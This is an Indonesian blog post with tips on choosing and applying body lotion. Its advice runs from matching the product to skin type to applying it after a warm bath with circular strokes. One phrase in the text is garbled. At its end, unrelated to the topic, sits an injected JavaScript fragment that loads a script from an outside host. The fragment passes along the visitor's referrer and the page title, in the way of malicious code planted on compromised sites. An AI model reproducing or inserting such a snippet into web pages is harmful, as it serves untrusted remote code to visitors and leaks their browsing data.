Tips Memakai Handbody

inkrn
Merawat merupakan suatu hal yang sebaiknya dilakukan guna memelihara apa yang kita miliki tetap terjaga dengan baik selain itu bisa sebagai ungkapan syukur atas apa yang ada pada kita. Pada sebagian besar kaum wanita, perawatan kulit tangan dan kaki masih sering terabaikan, padahal bagian tersebut seharusnya perlu mendapat perhatian lebih, terutama pada masalah kelembaban dan kehalusannya. Bila tidak dirawat dengan benar, maka kulit dapat tampak kering, kusam bahkan bisa menjadi lebih kasar.

Nah, untuk mengatasi masalah ini telah hadir produk kosmetika seperti handbody lotion yang merupakan pilihan utama bagi sebagian besar wanita. Produk berupa handbody ini sangat mudah kita dapatkan di toko-toko kosmetika atau salon kecantikan dengan harga yang bervariasi. Handbody hadir dalam beberapa varian yang berbeda sehingga terkadang menyulitkan kita dalam memilih yang sesuai dengan jenis kulit kita.
Pemilihan dan penggunaan handbody yang kurang tepat tentunya akan memberikan efek negatif pada kesehatan kulit. Maka dari itu sebelum memilih dan memakai handbody sebaiknya memperhatikan beberapa hal agar mendapatkan hasil yang bagus.

Tips Memakai Handbody Yang Benar dan Efektif :
1. Pilih Produk Handbody Yang Tepat
Memilih handbody sebaiknya disesuaikan dengan jenis kulit kita, terutama pada jenis kulit yang sensitif. Handbody yang paling tepat untuk jenis kulit sensitif sebaiknya menggunakan lotion yang tanpa aroma atau alergen dan tanpa paraben untuk menjaga kulit anda dari iritasi maupun alergi

2. Bersihkan Kulit Sebelum Menggunakan Handbody
Waktu terbaik untuk memakai produk perawatan kulit adalah setelah anda mandi, paling baik kalau mempergunakan air hangat saat mandi sebab dengan menggunakan air hangat selain kulit benar-benar bersih juga akan melembabkan kulit. Gunakan handbody lotion ketika kulit masih dalam keadaan lembab untuk meningkatkan penetrasi lotion dan mengurangi risiko iritasi

3. Memakai Handbody dengan Cara yang Benar
Perhatikan petunjuk pemakaian dan waktu kadaluarsa produk kosmetika yang akan anda gunakan.
Perhatikan jenis lotion tersebut sebelum digunakan karena ada beberapa jenis lotion yang memerlukan kocokan atau guncangan pada kemasan sebelum dioleskan pada kulit. Untuk menggunakan handbody, cukup dituangkan pada tangan dan kemudian dioleskan ke seluruh tubuh dengan perlahan-lahan secara tipis dan merata.
Pengolesan pertama sebaiknya dimulai dari pergelangan kaki keatas hingga pada dagu anda, dan bukan sebaliknya. Mengoleskan lotion dalam gerakan melingkar dengan menggunakan telapak tangan dengan sedikit menekan, memijat paman ke dalam kulit dan otot-otot akan memberikan hasil yang bagus untuk kulit anda.
Pada bagian wajah, pengolesan handbody lotion bisa dimulai dari dahi hingga ke dagu dengan gerakan melingkar, menggunakan penunjuk dan jari tengah di setiap sisi. Jangan sampai mata atau hidung dan mulut terkena lotion. Gunakan lotion khusus wajah pada kulit wajah anda agar hasilnya lebih sempurna.
Penggunaan handbody pada bagian bawah pergelangan dimulai dari pergelangan kaki hingga ke ujung jari kaki dengan gerakan yang sama seperti pada bagian tubuh lainnya dan diakhiri pada bagian telapak kaki anda.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave a Reply